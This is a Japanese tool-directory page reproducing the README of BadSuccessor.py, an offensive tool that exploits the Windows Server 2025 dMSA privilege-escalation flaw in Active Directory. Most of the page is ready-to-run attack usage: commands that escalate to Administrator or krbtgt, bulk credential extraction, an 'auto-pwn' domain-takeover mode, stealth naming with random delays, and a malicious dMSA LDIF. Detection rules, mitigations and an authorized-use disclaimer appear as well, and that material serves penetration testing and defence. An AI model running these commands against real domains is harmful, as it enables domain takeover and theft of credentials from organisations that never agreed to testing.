Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
badsuccessor — Windows Server 2025のdMSA権限昇格の脆弱性を悪用して、書き込み可能なOUを列挙し、任意のドメインユーザーへ権限昇格し、資格情報を抽出して、許可されたADセキュリティ評価においてドメイン乗っ取りを可能にします。 | Kitploit
ツール/GitHubGitHub/cybrly/badsuccessor
特権昇格偵察永続化メカニズムエクスプロイト横移動情報収集ポストエクスプロイトペネトレーションテストレッドチーミング敵対的攻撃
GitHubcybrly/badsuccessor

badsuccessor

1222061年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Windows Server 2025のdMSA権限昇格の脆弱性を悪用して、書き込み可能なOUを列挙し、任意のドメインユーザーへ権限昇格し、資格情報を抽出して、許可されたADセキュリティ評価においてドメイン乗っ取りを可能にします。

リポジトリを見る

BadSuccessor.py

Windows Server 2025 Active Directory 環境における dMSA(委任管理サービスアカウント)権限昇格の脆弱性を悪用するペネトレーションテストツール。

⚠️ 法的免責事項

このツールは、許可を得たペネトレーションテストおよびセキュリティ研究目的のみで使用すること。 明示的な書面による許可なくシステムに対してこのツールを使用することは、違法かつ非倫理的です。作者は、このツールの誤用または損害について一切の責任を負いません。

⚠️ 開発ステータスおよび環境テストに関する免責事項

重要:このツールは活発に開発およびテスト中です。

現在のステータス

  • Windows Server 2025 の採用状況:2025年5月時点で、Windows Server 2025 はまだ初期採用段階にあり、本番展開は限られています
  • 環境の差異:テストに利用可能な Windows Server 2025 環境が限られているため、このツールは未テストの構成に遭遇する可能性があります
  • 継続的な開発:より多くの環境バリエーションが展開・テストされるにつれて、ツールを積極的に改良しています

これが意味すること

  • アップデートを期待:新しい環境タイプがテストされるにつれて、ツールは頻繁にアップデートされます
  • 問題を報告:フィードバックは非常に重要です。遭遇した問題やエッジケースを報告してください
  • 慎重にテスト:まず非本番環境でテストしてください
  • スキーマの差異:Windows Server 2025 のビルドによって、dMSA 属性の実装方法が異なる場合があります
  • 機能の安定性:コア機能は安定していますが、一部の機能は特定の環境向けに調整が必要な場合があります

追跡中の既知の変数

  • 異なる Windows Server 2025 ビルドバージョン
  • スキーマ属性の命名規則
  • 地域別/ローカライズされた AD 実装
  • ハイブリッドクラウド構成
  • さまざまな AD 機能レベル
  • さまざまなセキュリティ強化構成

コミュニティテスト

セキュリティコミュニティの皆様に以下を推奨します:

  • 多様な環境でのテスト
  • 調査結果の共有(サニタイズ済み)
  • 互換性改善のためのプルリクエストの提出
  • 環境の差異の報告

このツールを使用することにより、本ツールが活発に開発中であり、特定の環境に応じた修正が必要になる可能性があることを承認したものとみなされます。

📋 概要

BadSuccessor は、Windows Server 2025 の委任管理サービスアカウント(dMSA)機能における権限昇格の脆弱性を悪用します。この脆弱性により、最小限の権限しか持たない攻撃者が、ドメイン管理者を含むドメイン内の任意のユーザーへ権限を昇格させることが可能になります。

研究クレジット

このツールは、Akamai Technologies の Yuval Gordon 氏による優れた研究に基づいています:

  • BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory

🎯 脆弱性の詳細

この脆弱性は dMSA 移行プロセスに存在し、以下の手順で発生します:

  1. 攻撃者は任意の書き込み可能な OU に悪意のある dMSA を作成します
  2. msDS-ManagedAccountPrecededByLink または ms-DS-Managed-Account-Preceded-By-Link を対象ユーザーを指すように設定します
  3. msDS-DelegatedMSAState または ms-DS-Delegated-MSA-State を 2(移行完了)に設定します
  4. KDC は PAC 継承を介して、dMSA に対象ユーザーのすべての権限を自動的に付与します

さらに、KERB-DMSA-KEY-PACKAGE 構造には対象ユーザーのパスワードキーが含まれており、資格情報の抽出が可能になります。

✅ 前提条件

システム要件

  • Linux マシン(ドメイン非参加)
  • Python 3.6+
  • 対象 Active Directory 環境へのネットワークアクセス
  • 対象ドメインには少なくとも1台の Windows Server 2025 ドメインコントローラーが必要

Python 依存関係```bash

pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0

root@kitploit:~
**注記**: このツールは impacket 0.12.0 でテストされています。バージョン互換性の警告は実行時に表示されます。

### 任意の依存関係```bash
# For DNS discovery
pip3 install dnspython

# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2

# RHEL/CentOS/Fedora
sudo yum install krb5-devel

必要な権限

  • 有効なドメイン資格情報(任意のユーザーアカウント)
  • 少なくとも1つの組織単位(OU)に対する以下のいずれかの権限:
    • CreateChild 権限
    • Write 権限
    • GenericWrite 権限
    • GenericAll 権限
    • 書き込みアクセスを持つ既定グループのメンバー(例: Authenticated Users)
  • ツールは書き込み可能なすべてのOUを自動的に検出し、具体的な権限を表示します

🚀 インストール```bash

git clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py

root@kitploit:~
### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0

📖 使い方

基本構文```bash

python3 badsuccessor.py -d -u -p [options]

root@kitploit:~
### クイックスタート例

#### 1. ドライラン モード (新機能) - 変更を加えずにテスト```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"

2. 環境を列挙する```bash

Check Windows Server 2025 schema support

python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema

Find ALL writable OUs with detailed permissions

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate

List high-value targets

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets

Validate specific target account

python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator

root@kitploit:~
#### 3. 攻撃を実行```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator

# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30

# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
  --dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
  --dmsa-display-name "Production Service"

# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
  --dmsa-pattern "svc{random}prod"

4. 認証情報の抽出```bash

Extract credentials for multiple users

python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql

Auto-pwn mode (fully automated)

python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn

root@kitploit:~
#### 5. セッション管理 (新規)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234

# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID

# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all

6. 結果のエクスポート (新規)```bash

Export enumeration results to JSON

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json

Export to CSV

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv

Generate HTML report

python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html

Combined operation with exports

python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
--export-json attack_results.json --export-html attack_report.html

root@kitploit:~
### コマンドラインオプション

#### 認証引数
| オプション | 説明 |
|--------|-------------|
| `-d, --domain` | 対象ドメイン(例: corp.local)**[必須]** |
| `-u, --username` | 認証用ユーザー名 **[必須]** |
| `-p, --password` | 認証用パスワード |
| `--dc-ip` | ドメインコントローラのIP(省略時は自動検出) |
| `--ldaps` | ポート636でLDAPS(SSL)接続を強制 |

#### 攻撃モード
| オプション | 説明 |
|--------|-------------|
| `--attack` | BadSuccessor攻撃を実行 |
| `--dry-run` | **新機能**: 変更を行わずに攻撃をシミュレート |
| `--extract-creds` | キーパッケージを使用して資格情報を抽出 |
| `--auto-pwn` | 完全自動化されたドメイン乗っ取り |

#### ターゲット指定
| オプション | 説明 |
|--------|-------------|
| `--target` | 権限を昇格させる対象ユーザー |
| `--targets` | 資格情報抽出のためのユーザー一覧(カンマ区切り) |
| `--validate-target` | **新機能**: 攻撃せずにターゲットアカウントを検証 |

#### dMSA構成
| オプション | 説明 |
|--------|-------------|
| `--dmsa-name` | 悪意のあるdMSAの名前(未指定の場合は自動生成) |
| `--dmsa-pattern` | **新機能**: dMSA命名のパターン(例: "svc{random}{target}") |
| `--ou-dn` | 使用する特定のOU DN(未指定の場合は自動検出) |
| `--dmsa-description` | **新機能**: 作成するdMSAの説明 |
| `--dmsa-display-name` | **新機能**: 作成するdMSAの表示名 |

#### 列挙オプション
| オプション | 説明 |
|--------|-------------|
| `--enumerate` | 任意の書き込み権限を持つOUを列挙 |
| `--list-targets` | 高価値ターゲットを一覧表示 |
| `--check-schema` | Windows Server 2025スキーマを検証 |

#### セッション管理(新機能)
| オプション | 説明 |
|--------|-------------|
| `--session-id` | 既存のセッションを再開 |
| `--list-sessions` | 利用可能な全セッションを一覧表示 |
| `--cleanup-session SESSION_ID` | セッションからすべてのdMSAをクリーンアップ |

#### クリーンアップオプション
| オプション | 説明 |
|--------|-------------|
| `--cleanup` | 作成したdMSAを削除 |
| `--dmsa-dn` | クリーンアップ操作のためのdMSA DN |
| `--cleanup-all` | **新機能**: 現在のセッションからすべてのdMSAをクリーンアップ |

#### 出力オプション
| オプション | 説明 |
|--------|-------------|
| `--export-json FILE` | **新機能**: 結果をJSONファイルにエクスポート |
| `--export-csv FILE` | **新機能**: 結果をCSVファイルにエクスポート |
| `--export-html FILE` | **新機能**: HTMLレポートを生成 |
| `--no-banner` | バナー出力を抑制 |
| `--verbose` | 詳細出力を有効化 |

#### ステルスオプション(新機能)
| オプション | 説明 |
|--------|-------------|
| `--stealth` | ステルスモードを有効化(無害な命名) |
| `--random-delay SECONDS` | 操作間のランダム遅延(0〜N秒) |

## 🔧 攻撃ワークフロー

### フェーズ1: 偵察
1. **スキーマ検証**: 動的属性検出によりWindows Server 2025のdMSAサポートを確認
2. **権限の発見**: (CreateChildだけでなく)任意の書き込みアクセス権を持つOUを特定
3. **ターゲット検証**: **新機能** - 攻撃前の包括的なターゲットアカウント分析

### フェーズ2: 悪用
1. **ドライランオプション**: **新機能** - 変更を行わずに攻撃の実現可能性をテスト
2. **dMSA作成**: カスタマイズ可能な属性を持つ悪意のあるdMSAを作成
3. **属性操作**: スキーマを考慮して先行リンクと移行状態を設定
4. **セッショントラッキング**: **新機能** - 作成されたすべてのオブジェクトを追跡し、簡単にクリーンアップ

### フェーズ3: 認証
1. **Kerberos TGT要求**: 継承された権限を持つTGTを取得
2. **PAC分析**: 継承されたグループメンバーシップを検証
3. **キーパッケージ抽出**: 複数のフォールバック方式による拡張パース処理

### フェーズ4: 侵害後活動
このツールはすぐに使用できるコマンドを提供します:
- DCSync攻撃(すべてのドメインハッシュのダンプ)
- リモートコマンド実行
- ラテラルムーブメント(横展開)
- 永続化の確立

## 🔐 本番対応機能(v3.0.0)

### 動的スキーマ検出(新機能)
- お使いの環境が使用している属性命名規則を自動検出
- dMSA属性の既知のすべてのバリエーションをサポート
- 異なるWindows Server 2025ビルド向けのフォールバックメカニズム

### 拡張ターゲット検証(新機能)
- 攻撃前のターゲットアカウント検証
- 無効化、ロック、期限切れのアカウントを検出
- スマートカード要件と委任制限について警告
- ターゲットのプロパティに基づく推奨事項を提供

### セッション管理(新機能)
- 操作全体にわたる永続的なセッション追跡
- 中断された攻撃の再開
- 作成されたすべてのdMSAの一括クリーンアップ
- セッションファイルを0700パーミッションで安全に保存

### ドライランモード(新機能)
- 何も変更せずに攻撃の実現可能性をテスト
- スキーマ、権限、ターゲットを検証
- 実際の攻撃中に何が起こるかを正確に報告
- 偵察と計画に最適

### ステルス機能(新機能)
- 周囲に溶け込む無害なdMSA命名パターン
- 操作間のランダム遅延
- カスタマイズ可能なdMSA属性(説明、表示名)
- 変数を使用したパターンベースの命名

### プロフェッショナルな出力形式(新機能)
- 他のツールとの統合のためのJSONエクスポート
- スプレッドシート分析のためのCSVエクスポート
- スタイル付き出力のHTMLレポート
- すべての操作の構造化データ

### エンタープライズグレードのエラー処理
- 実行可能な解決策を備えた包括的なエラーメッセージ
- すべての操作のグレースフルなフォールバック
- タイムスタンプと重大度を備えた詳細なロギング
- トラブルシューティングのための詳細モード

### 完全な実装
- すべての機能が完全に実装済み(プレースホルダーコードなし)
- 本番環境でテスト済みのコード構造
- 専用クラスを使用したモジュール設計
- さまざまなAD構成との完全な互換性

## 🛡️ 検出

### 監視すべきイベントID
| イベントID | ソース | 説明 |
|----------|--------|-------------|
| **5137** | セキュリティ | ディレクトリサービスオブジェクトの作成(dMSA) |
| **5136** | セキュリティ | ディレクトリサービスオブジェクトの変更 |
| **2946** | ディレクトリサービス | グループ管理サービスアカウントの認証 |
| **4768** | セキュリティ | Kerberos TGTの要求 |
| **4769** | セキュリティ | Kerberosサービスチケットの要求 |

### 検出ルール```
# Splunk Query Example
index=windows EventCode=5137
| where ObjectClass="msDS-DelegatedManagedServiceAccount" OR ObjectClass="ms-DS-Delegated-Managed-Service-Account"
| where NOT user IN ("approved_admins")

# Sigma Rule Example
detection:
  selection:
    EventID: 5136
    AttributeLDAPDisplayName:
      - 'msDS-ManagedAccountPrecededByLink'
      - 'ms-DS-Managed-Account-Preceded-By-Link'
  condition: selection

行動指標

  • サービスアカウントの迅速な作成と削除
  • 非管理者ユーザーによるdMSAの作成
  • 移行関連属性への異常な変更
  • 予期しないソースからのサービスアカウントの認証
  • 不審な命名パターンを持つdMSA

🔒 緩和策

即時対応

  1. OU権限を制限する ```powershell

    Remove ALL write permissions from non-admin users

    Remove-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" -User "Domain Users" -AccessRights CreateChild,Write,GenericWrite,GenericAll

    Check for default group permissions

    Get-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" | Where-Object {$_.IdentityReference -match "Authenticated Users|Everyone"}

    root@kitploit:~
  2. dMSA操作を監視 ```powershell

    Enable auditing on dMSA attributes (both naming conventions)

    Set-ADObject -Identity "CN=Schema,CN=Configuration,DC=corp,DC=local" -Add @{ 'msDS-ReplAttributeMetaData' = @('msDS-ManagedAccountPrecededByLink', 'ms-DS-Managed-Account-Preceded-By-Link') }

    root@kitploit:~
  3. 検出の実装

    • 提供された検出ルールを展開する
    • 呼び出し元がS-1-5-7のEvent ID 2946でアラートを発報する
    • 属性の変更を監視する
    • dMSA作成パターンを追跡する

長期的な対策

  • 利用可能になったらMicrosoftのパッチを適用する
  • 定期的な権限監査(CreateChildだけでなく、すべての書き込み権限を確認する)
  • 最小権限の原則を徹底する
  • 不要な場合はdMSAの無効化を検討する
  • サービスアカウント作成の承認ワークフローを導入する

📊 統計

Akamaiの調査に基づく:

  • 91% の環境に脆弱な権限がある
  • デフォルト設定で動作する
  • Windows Server 2025 DCを導入している組織に影響する
  • 現在利用可能なパッチはない

🏗️ 技術的実装の詳細

dMSAオブジェクト構造```ldif

dn: CN=evil_dmsa,OU=ServiceAccounts,DC=corp,DC=local objectClass: top objectClass: msDS-GroupManagedServiceAccount objectClass: msDS-DelegatedManagedServiceAccount sAMAccountName: evil_dmsa$ userAccountControl: 4096

Note: Your environment may use either format below

msDS-ManagedAccountPrecededByLink: CN=Administrator,CN=Users,DC=corp,DC=local

OR

ms-DS-Managed-Account-Preceded-By-Link: CN=Administrator,CN=Users,DC=corp,DC=local msDS-DelegatedMSAState: 2 msDS-SupportedEncryptionTypes: 28

root@kitploit:~
### キーパッケージ構造
KERB-DMSA-KEY-PACKAGE には以下が含まれます:
- 現在のキー: dMSA の暗号化キー
- 以前のキー: 対象ユーザーの暗号化キー (NTLM ハッシュを含む)
- パスワードクラッキングなしで直接資格情報を抽出できます

## 🤝 コントリビューション

コントリビューションを歓迎します! 以下の手順でお願いします:
1. リポジトリをフォーク
2. フィーチャーブランチを作成 (`git checkout -b feature/enhancement`)
3. 変更をコミット (`git commit -m 'Add new feature'`)
4. ブランチにプッシュ (`git push origin feature/enhancement`)
5. プルリクエストを送信

### 開発ガイドライン
- PEP 8 スタイルガイドに従う
- 新機能のユニットテストを追加
- ドキュメントを更新
- 複数のAD環境でテスト
- 異なるスキーマ属性命名規則でテスト
- すべての機能が本番対応であることを確認 (プレースホルダーなし)

## 📝 変更履歴

### v2.3.0 (2025-05-28) - 本番対応リリース
- **新機能**: 安全な攻撃シミュレーションのためのドライラン モード
- **新機能**: 状態永続化を備えた包括的なセッション管理
- **新機能**: 詳細な分析を伴うターゲットアカウントの検証
- **新機能**: エクスポート機能 (JSON, CSV, HTML)
- **新機能**: 無害な命名パターンを使用したステルスモード
- **新機能**: カスタマイズ可能な dMSA 属性 (説明、表示名)
- **新機能**: 変数を使用したパターンベースの dMSA 命名
- **新機能**: ステルス操作のためのランダム遅延サポート
- **新機能**: 動的なスキーマ属性検出
- **新機能**: フォールバック付きの拡張キーパッケージ解析
- **新機能**: 一括クリーンアップ操作
- **新機能**: プロフェッショナルなエラーハンドリングとロギング
- **改善**: 完全なモジュラーアーキテクチャ
- **改善**: 依存関係のバージョンチェック
- **修正**: すべてのプレースホルダーコードを完全な実装に置き換え

### v2.2.0 (2025-05-27) - 互換性アップデート
- **修正**: impacket のインポート問題を解決 (seq_decode 依存を削除)
- **修正**: impacket 0.12.0 と互換
- **機能**: 両方の dMSA 属性命名規則のサポートを追加
- **改善**: インポート失敗時のエラーハンドリングを改善
- **改善**: より堅牢なスキーマ検出

### v2.1.0 (2025-05-25) - 完全実装
- **メジャー**: ACL 権限チェックを強化 - すべての書き込み権限を検出するようになりました
- **メジャー**: デフォルトグループ (Authenticated Users、Everyone など) のサポートを追加
- **修正**: すべてのプレースホルダーコードを削除
- **修正**: すべての機能を完全実装
- **改善**: より良いエラーハンドリングと情報量の多い出力
- **改善**: より包括的な OU 列挙 (コンテナを含む)
- **機能**: 検出された各 OU の正確な権限を表示
- **機能**: 保護されたユーザーと委任制限を検出

### v2.0.0 (2025-05-24) - 拡張版
- **メジャー**: 完全な Kerberos 認証の実装
- **メジャー**: 資格情報窃取のための KERB-DMSA-KEY-PACKAGE 抽出
- **メジャー**: 基本的な ACL 権限チェック
- **メジャー**: Windows Server 2025 スキーマ検証
- **機能**: 大量資格情報抽出モード
- **機能**: 自動ドメイン乗っ取りのための Auto-pwn
- **機能**: 強化されたターゲット列挙
- **機能**: ポストエクスプロイテーションコマンド生成
- **改善**: より良いエラーハンドリングとロギング
- **改善**: 本番対応のコード構造

## 📚 リファレンス

- [元の Akamai リサーチ](https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory)
- [GitHub Issue #1 - 強化された権限チェック](https://github.com/cybrly/badsuccessor/issues/1)
- [GitHub Issue #2 - スキーマ属性命名](https://github.com/cybrly/badsuccessor/issues/2)
- [Microsoft Security Response Center](https://msrc.microsoft.com/)

## 🐛 既知の問題

- 一部の環境では異なる属性命名規則を使用する場合があります (動的検出で対応)
- ハッシュ認証には初期実装でパスワードが必要です
- 一部の環境では手動の Kerberos 設定が必要な場合があります
- 検出ルールは環境ごとにカスタマイズが必要です

## 🔍 トラブルシューティング

### インポートエラー
impacket でインポートエラーが発生した場合:```bash
# Ensure you have the correct version
pip3 uninstall impacket
pip3 install impacket==0.12.0

# Check version
python3 -c "import impacket; print(impacket.__version__)"

スキーマ検出の失敗

このツールには現在、動的スキーマ検出が含まれています。それでも失敗する場合:```powershell

On Domain Controller - Check actual attribute names

Get-ADObject -Filter {name -like "delegated" -or name -like "preceded"} -SearchBase "CN=Schema,CN=Configuration,DC=corp,DC=local" | Select Name

root@kitploit:~
### アクセス拒否エラー
新しいdry-runモードでテストしてください:```bash
# Test without making changes
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator

# Check your exact permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --verbose

セッションの問題```bash

List sessions

python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions

Clean up stale sessions

rm -rf /tmp/.badsuccessor_sessions/

root@kitploit:~
## 📧 連絡先

質問、問題、または責任ある開示については:
- GitHub Issueを開いてください
- 責任ある開示の慣行に従ってください
- パッチ開発には90日間の猶予を設けてください

---

**⚡ 覚えておいてください:大いなる力には大いなる責任が伴います。テストの前に必ず適切な許可を取得してください!** 🔐
ツールをダウンロード